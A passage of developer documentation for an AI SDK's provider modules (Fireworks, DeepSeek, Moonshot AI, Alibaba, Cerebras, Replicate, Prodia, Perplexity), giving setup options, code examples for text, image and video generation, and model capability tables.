`accounts/fireworks/models/yi-large`
`accounts/fireworks/models/kimi-k2-instruct`
`accounts/fireworks/models/kimi-k2-thinking`
`accounts/fireworks/models/kimi-k2p5`
`accounts/fireworks/models/minimax-m2`

Embedding Models

You can create models that call the Fireworks embeddings API using the .embeddingModel() factory method:

const model = fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5');

You can use Fireworks embedding models to generate embeddings with the embed function:

import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';

const { embedding } = await embed({
  model: fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`nomic-ai/nomic-embed-text-v1.5`	768	8192

Image Models

You can create Fireworks image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Image Editing

Fireworks supports image editing through FLUX Kontext models (flux-kontext-pro and flux-kontext-max). Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  providerOptions: {
    fireworks: {
      output_format: 'jpeg',
    },
  },
});

Style Transfer

Apply artistic styles to an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
  prompt: {
    text: 'Transform this into a watercolor painting style',
    images: [imageBuffer],
  },
  aspectRatio: '1:1',
});

Model Capabilities

For all models supporting aspect ratios, the following aspect ratios are supported:

1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9

For all models supporting size, the following sizes are supported:

640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024x1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640

Model	Dimensions Specification	Image Editing
`accounts/fireworks/models/flux-kontext-pro`	Aspect Ratio
`accounts/fireworks/models/flux-kontext-max`	Aspect Ratio
`accounts/fireworks/models/flux-1-dev-fp8`	Aspect Ratio
`accounts/fireworks/models/flux-1-schnell-fp8`	Aspect Ratio
`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	Size
`accounts/fireworks/models/japanese-stable-diffusion-xl`	Size
`accounts/fireworks/models/playground-v2-1024px-aesthetic`	Size
`accounts/fireworks/models/SSD-1B`	Size
`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	Size

For more details, see the Fireworks models page.

Stability AI Models

Fireworks also presents several Stability AI models backed by Stability AI API keys and endpoint. The AI SDK Fireworks provider does not currently include support for these models:

Model ID
`accounts/stability/models/sd3-turbo`
`accounts/stability/models/sd3-medium`
`accounts/stability/models/sd3`

title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.

DeepSeek Provider

The DeepSeek provider offers access to powerful language models through the DeepSeek API.

API keys can be obtained from the DeepSeek Platform.

Setup

The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:

Provider Instance

You can import the default provider instance deepseek from @ai-sdk/deepseek:

import { deepseek } from '@ai-sdk/deepseek';

For custom configuration, you can import createDeepSeek and create a provider instance with your settings:

import { createDeepSeek } from '@ai-sdk/deepseek';

const deepseek = createDeepSeek({
  apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepSeek provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chat() or .languageModel() factory methods:

const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');

DeepSeek language models can be used in the streamText function (see AI SDK Core).

The following optional provider options are available for DeepSeek models:

thinking object

Optional. Controls thinking mode (chain-of-thought reasoning). You can enable thinking mode either by using the deepseek-reasoner model or by setting this option.
- type: 'enabled' | 'disabled' - Enable or disable thinking mode.

import { deepseek, type DeepSeekLanguageModelOptions } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    deepseek: {
      thinking: { type: 'enabled' },
    } satisfies DeepSeekLanguageModelOptions,
  },
});

Reasoning

DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:

import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';

const result = streamText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'How many "r"s are in the word "strawberry"?',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    // This is the reasoning text
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text') {
    // This is the final answer
    console.log('Answer:', part.text);
  }
}

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Token Usage

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const result = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Your prompt here',
});

console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }

The metrics include:

promptCacheHitTokens: Number of input tokens that were cached
promptCacheMissTokens: Number of input tokens that were not cached

Model Capabilities

Model	Text Generation	Object Generation	Image Input	Tool Usage	Tool Streaming
`deepseek-chat`
`deepseek-reasoner`

title: Moonshot AI description: Learn how to use Moonshot AI models with the AI SDK.

Moonshot AI Provider

The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.

API keys can be obtained from the Moonshot Platform.

Setup

The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:

Provider Instance

You can import the default provider instance moonshotai from @ai-sdk/moonshotai:

import { moonshotai } from '@ai-sdk/moonshotai';

For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:

import { createMoonshotAI } from '@ai-sdk/moonshotai';

const moonshotai = createMoonshotAI({
  apiKey: process.env.MOONSHOT_API_KEY ?? '',
});

You can use the following optional settings to customize the Moonshot AI provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.moonshot.ai/v1
apiKey string

API key that is being sent using the Authorization header. It defaults to the MOONSHOT_API_KEY environment variable
headers Record<string,string>

Custom headers to include in the requests
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation

Language Models

You can create language models using a provider instance:

import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: moonshotai('kimi-k2.5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');

Moonshot AI language models can be used in the streamText function (see AI SDK Core).

Reasoning Models

import {
  moonshotai,
  type MoonshotAILanguageModelOptions,
} from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: moonshotai('kimi-k2-thinking'),
  providerOptions: {
    moonshotai: {
      thinking: { type: 'enabled', budgetTokens: 2048 },
      reasoningHistory: 'interleaved',
    } satisfies MoonshotAILanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log(reasoningText);
console.log(text);

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Provider Options

The following optional provider options are available for Moonshot AI language models:

thinking object

Configuration for thinking/reasoning models like Kimi K2 Thinking.
- type 'enabled' | 'disabled'
  
  Whether to enable thinking mode
- budgetTokens number
  
  Maximum number of tokens for thinking (minimum 1024)
reasoningHistory 'disabled' | 'interleaved' | 'preserved'

Controls how reasoning history is handled in multi-turn conversations:
- 'disabled': Remove reasoning from history
- 'interleaved': Include reasoning between tool calls within a single turn
- 'preserved': Keep all reasoning in history

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`moonshot-v1-8k`
`moonshot-v1-32k`
`moonshot-v1-128k`
`kimi-k2`
`kimi-k2.5`
`kimi-k2-thinking`
`kimi-k2-thinking-turbo`
`kimi-k2-turbo`

title: Alibaba description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.

Alibaba Provider

Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.

API keys can be obtained from the Console.

Setup

The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:

Provider Instance

You can import the default provider instance alibaba from @ai-sdk/alibaba:

import { alibaba } from '@ai-sdk/alibaba';

For custom configuration, you can import createAlibaba and create a provider instance with your settings:

import { createAlibaba } from '@ai-sdk/alibaba';

const alibaba = createAlibaba({
  apiKey: process.env.ALIBABA_API_KEY ?? '',
});

You can use the following optional settings to customize the Alibaba provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is https://dashscope-intl.aliyuncs.com/compatible-mode/v1.
videoBaseURL string

Use a different URL prefix for video generation API calls. The video API uses the DashScope native endpoint (not the OpenAI-compatible endpoint). The default prefix is https://dashscope-intl.aliyuncs.com.
apiKey string

API key that is being sent using the Authorization header. It defaults to the ALIBABA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.
includeUsage boolean

Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to true.

Language Models

You can create language models using a provider instance:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');

Alibaba language models can be used in the streamText function (see AI SDK Core).

The following optional provider options are available for Alibaba models:

enableThinking boolean

Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to false.
thinkingBudget number

Maximum number of reasoning tokens to generate. Limits the length of thinking content.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.

Thinking Mode

Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:

import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: alibaba('qwen3-max'),
  providerOptions: {
    alibaba: {
      enableThinking: true,
      thinkingBudget: 2048,
    } satisfies AlibabaLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log('Reasoning:', reasoning);
console.log('Answer:', text);

For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.

Tool Calling

Alibaba models support tool calling with parallel execution:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Prompt Caching

Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.

Single message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'system',
      content: 'You are a helpful assistant. [... long system prompt ...]',
      providerOptions: {
        alibaba: {
          cacheControl: { type: 'ephemeral' },
        },
      },
    },
  ],
});

Multi-part message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const longDocument = '... large document content ...';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Context: Please analyze this document.',
        },
        {
          type: 'text',
          text: longDocument,
          providerOptions: {
            alibaba: {
              cacheControl: { type: 'ephemeral' },
            },
          },
        },
      ],
    },
  ],
});

Note: The minimum content length for a cache block is 1,024 tokens.

Video Models

You can create Wan video models that call the Alibaba Cloud DashScope API using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

Alibaba supports three video generation modes: text-to-video, image-to-video (first frame), and reference-to-video.

Text-to-Video

Generate videos from text prompts:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-t2v'),
  prompt: 'A serene mountain lake at sunset with gentle ripples on the water.',
  resolution: '1280x720',
  duration: 5,
  providerOptions: {
    alibaba: {
      promptExtend: true,
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Image-to-Video

Generate videos from a first-frame image and optional text prompt:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-i2v'),
  prompt: {
    image: 'https://example.com/landscape.jpg',
    text: 'Camera slowly pans across the landscape',
  },
  duration: 5,
  providerOptions: {
    alibaba: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Reference-to-Video

Generate videos using reference images and/or videos for character consistency. Use character identifiers (character1, character2, etc.) in your prompt to reference them:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-r2v-flash'),
  prompt: 'character1 walks through a beautiful garden and waves at the camera',
  resolution: '1280x720',
  duration: 5,
  providerOptions: {
    alibaba: {
      referenceUrls: ['https://example.com/character-reference.jpg'],
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.alibaba:

negativePrompt string

A description of what to avoid in the generated video (max 500 characters).
audioUrl string

URL to an audio file for audio-video sync (WAV/MP3, 3-30 seconds, max 15MB).
promptExtend boolean

Enable prompt extension/rewriting for better generation quality. Defaults to true.
shotType 'single' | 'multi'

Shot type for video generation. 'multi' enables multi-shot cinematic narrative (wan2.6 models only).
watermark boolean

Whether to add a watermark to the generated video. Defaults to false.
audio boolean

Whether to generate audio (for I2V and R2V models that support it).
referenceUrls string[]

Array of reference image/video URLs for reference-to-video mode. Supports 0-5 images and 0-3 videos, max 5 total.
pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).

Video Model Capabilities

Text-to-Video

Model	Audio	Resolution	Duration
`wan2.6-t2v`	Yes	720P, 1080P	2-15s
`wan2.5-t2v-preview`	Yes	480P, 720P, 1080P	5s, 10s

Image-to-Video (First Frame)

Model	Audio	Resolution	Duration
`wan2.6-i2v-flash`	Optional	720P, 1080P	2-15s
`wan2.6-i2v`	Yes	720P, 1080P	2-15s

Reference-to-Video

Model	Audio	Resolution	Duration
`wan2.6-r2v-flash`	Optional	720P, 1080P	2-10s
`wan2.6-r2v`	Yes	720P, 1080P	2-10s

Model Capabilities

Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.

title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.

Cerebras Provider

The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.

API keys can be obtained from the Cerebras Platform.

Setup

The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:

Provider Instance

You can import the default provider instance cerebras from @ai-sdk/cerebras:

import { cerebras } from '@ai-sdk/cerebras';

For custom configuration, you can import createCerebras and create a provider instance with your settings:

import { createCerebras } from '@ai-sdk/cerebras';

const cerebras = createCerebras({
  apiKey: process.env.CEREBRAS_API_KEY ?? '',
});

You can use the following optional settings to customize the Cerebras provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cerebras('llama3.1-8b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cerebras language models can be used in the streamText function (see AI SDK Core).

You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:

const model = cerebras('llama-3.3-70b');

You can also use the .languageModel() and .chat() methods:

const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');

Reasoning Models

For gpt-oss-120b, you can control the reasoning depth using the reasoningEffort provider option:

import { cerebras } from '@ai-sdk/cerebras';
import { streamText } from 'ai';

const result = streamText({
  model: cerebras('gpt-oss-120b'),
  providerOptions: {
    cerebras: {
      reasoningEffort: 'medium',
    },
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Provider Options

The following optional provider options are available for Cerebras language models:

reasoningEffort 'low' | 'medium' | 'high'

Controls the depth of reasoning for GPT-OSS models. Defaults to 'medium'.
user string

A unique identifier representing your end-user, which can help with monitoring and abuse detection.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Defaults to true.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Reasoning
`llama3.1-8b`
`llama-3.3-70b`
`gpt-oss-120b`
`qwen-3-32b`
`qwen-3-235b-a22b-instruct-2507`
`qwen-3-235b-a22b-thinking-2507`
`zai-glm-4.6`
`zai-glm-4.7`

title: Replicate description: Learn how to use Replicate models with the AI SDK.

Replicate Provider

Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.

Setup

The Replicate provider is available via the @ai-sdk/replicate module. You can install it with

Provider Instance

You can import the default provider instance replicate from @ai-sdk/replicate:

import { replicate } from '@ai-sdk/replicate';

If you need a customized setup, you can import createReplicate from @ai-sdk/replicate and create a provider instance with your settings:

import { createReplicate } from '@ai-sdk/replicate';

const replicate = createReplicate({
  apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});

You can use the following optional settings to customize the Replicate provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
apiToken string

API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Image Models

You can create Replicate image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Supported Image Models

The following image models are currently supported by the Replicate provider:

Text-to-Image Models:

Inpainting and Image Editing Models:

Flux-2 Models (Multi-Reference Image Generation):

These models support up to 8 input reference images for style transfer and composition:

Basic Usage

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';

const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-schnell'),
  prompt: 'The Loch Ness Monster getting a manicure',
  aspectRatio: '16:9',
});

await writeFile('image.webp', image.uint8Array);

console.log('Image saved as image.webp');

Model-specific options

import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image('recraft-ai/recraft-v3'),
  prompt: 'The Loch Ness Monster getting a manicure',
  size: '1365x1024',
  providerOptions: {
    replicate: {
      style: 'realistic_image',
    } satisfies ReplicateImageModelOptions,
  },
});

Versioned Models

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image(
    'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
  ),
  prompt: 'The Loch Ness Monster getting a manicure',
});

Image Editing

Replicate supports image editing through various models. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-fill-dev'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  providerOptions: {
    replicate: {
      guidance_scale: 7.5,
      num_inference_steps: 30,
    } satisfies ReplicateImageModelOptions,
  },
});

Inpainting with Mask

Edit specific parts of an image using a mask. For FLUX Fill models, white areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White = inpaint, black = keep

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-fill-pro'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
  providerOptions: {
    replicate: {
      guidance_scale: 7.5,
      num_inference_steps: 30,
    } satisfies ReplicateImageModelOptions,
  },
});

Multi-Reference Image Generation (Flux-2)

Flux-2 models support up to 8 input reference images for style transfer, composition, and multi-subject generation:

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const reference1 = readFileSync('./style-reference.png');
const reference2 = readFileSync('./subject-reference.png');

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-2-pro'),
  prompt: {
    text: 'Combine the style and subjects from the reference images',
    images: [reference1, reference2],
  },
});

Provider Options

Common provider options for image generation:

maxWaitTimeInSeconds number - Maximum time in seconds to wait for the prediction to complete in sync mode. By default, Replicate uses sync mode with a 60-second timeout. Set to a positive number to use a custom duration (e.g., 120 for 2 minutes). When not specified, uses the default 60-second wait.
guidance_scale number - Guidance scale for classifier-free guidance. Higher values make the output more closely match the prompt.
num_inference_steps number - Number of denoising steps. More steps = higher quality but slower.
negative_prompt string - Negative prompt to guide what to avoid in the generation.
output_format 'png' | 'jpg' | 'webp' - Output image format.
output_quality number (1-100) - Output image quality. Only applies to jpg and webp.
strength number (0-1) - Strength of the transformation for img2img. Lower values keep more of the original image.

For more details, see the Replicate models page.

title: Prodia description: Learn how to use Prodia models with the AI SDK.

Prodia Provider

Prodia is a fast inference platform for generative AI, offering high-speed image generation with FLUX and Stable Diffusion models.

Setup

The Prodia provider is available via the @ai-sdk/prodia module. You can install it with

Provider Instance

You can import the default provider instance prodia from @ai-sdk/prodia:

import { prodia } from '@ai-sdk/prodia';

If you need a customized setup, you can import createProdia and create a provider instance with your settings:

import { createProdia } from '@ai-sdk/prodia';

const prodia = createProdia({
  apiKey: 'your-api-key', // optional, defaults to PRODIA_TOKEN environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Prodia provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://inference.prodia.com/v2.
apiKey string

API key that is being sent using the Authorization header as a Bearer token. It defaults to the PRODIA_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Prodia image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { writeFileSync } from 'node:fs';
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A cat wearing an intricate robe',
});

const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Prodia offers fast inference for various image generation models. Here are the supported model types:

Model	Description
`inference.flux-fast.schnell.txt2img.v2`	Fast FLUX Schnell model for text-to-image generation
`inference.flux.schnell.txt2img.v2`	FLUX Schnell model for text-to-image generation

Image Size

You can specify the image size using the size parameter in WIDTHxHEIGHT format:

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
  size: '1024x768',
});

Provider Options

Prodia image models support additional options through the providerOptions.prodia object:

import { prodia, type ProdiaImageModelOptions } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A cat wearing an intricate robe',
  providerOptions: {
    prodia: {
      width: 1024,
      height: 768,
      steps: 4,
      stylePreset: 'cinematic',
    } satisfies ProdiaImageModelOptions,
  },
});

The following provider options are supported:

width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
steps number - Number of computational iterations (1–4). More steps typically produce higher quality results.
stylePreset string - Apply a visual theme to the output image. Supported presets: 3d-model, analog-film, anime, cinematic, comic-book, digital-art, enhance, fantasy-art, isometric, line-art, low-poly, neon-punk, origami, photographic, pixel-art, texture, craft-clay.
loras string[] - Augment the output with up to 3 LoRA models.
progressive boolean - When using JPEG output, return a progressive JPEG.

Seed

You can use the seed parameter to get reproducible results:

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
  seed: 12345,
});

Provider Metadata

The generateImage response includes provider-specific metadata in providerMetadata.prodia.images[]. Each image object may contain the following properties:

jobId string - The unique identifier for the generation job.
seed number - The seed used for generation. Useful for reproducing results.
elapsed number - Generation time in seconds.
iterationsPerSecond number - Processing speed metric.
createdAt string - Timestamp when the job was created.
updatedAt string - Timestamp when the job was last updated.

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
});

// Access provider metadata
const metadata = providerMetadata?.prodia?.images?.[0];
console.log('Job ID:', metadata?.jobId);
console.log('Seed:', metadata?.seed);
console.log('Elapsed:', metadata?.elapsed);

title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.

Perplexity Provider

API keys can be obtained from the Perplexity Platform.

Setup

The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:

Provider Instance

You can import the default provider instance perplexity from @ai-sdk/perplexity:

import { perplexity } from '@ai-sdk/perplexity';

For custom configuration, you can import createPerplexity and create a provider instance with your settings:

import { createPerplexity } from '@ai-sdk/perplexity';

const perplexity = createPerplexity({
  apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});

You can use the following optional settings to customize the Perplexity provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Perplexity models using a provider instance:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

Sources

Websites that have been used to generate the response are included in the sources property of the result:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

console.log(sources);

Provider Options & Metadata

The Perplexity provider includes additional metadata in the response through providerMetadata. Additional configuration options are available through providerOptions.

const result = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
  providerOptions: {
    perplexity: {
      return_images: true, // Enable image responses (Tier-2 Perplexity users only)
      search_recency_filter: 'week', // Filter search results by recency
    },
  },
});

console.log(result.providerMetadata);
// Example output:
// {
//   perplexity: {
//     usage: { citationTokens: 5286, numSearchQueries: 1 },
//     images: [
//       { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
//       { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
//     ]
//   },
// }

Provider Options

The following provider-specific options are available:

return_images boolean

Enable image responses. When set to true, the response may include relevant images. This feature is only available to Perplexity Tier-2 users and above.
search_recency_filter string

Filter search results by recency. Possible values: 'hour', 'day', 'week', 'month'. If not specified, defaults to all time.

Provider Metadata

The response metadata includes:

usage: Object containing citationTokens and numSearchQueries metrics
images: Array of image objects when return_images is enabled (Tier-2 users only). Each image contains imageUrl, originUrl, height, and width.

PDF Support

The Perplexity provider supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: perplexity('sonar-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is this document about?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
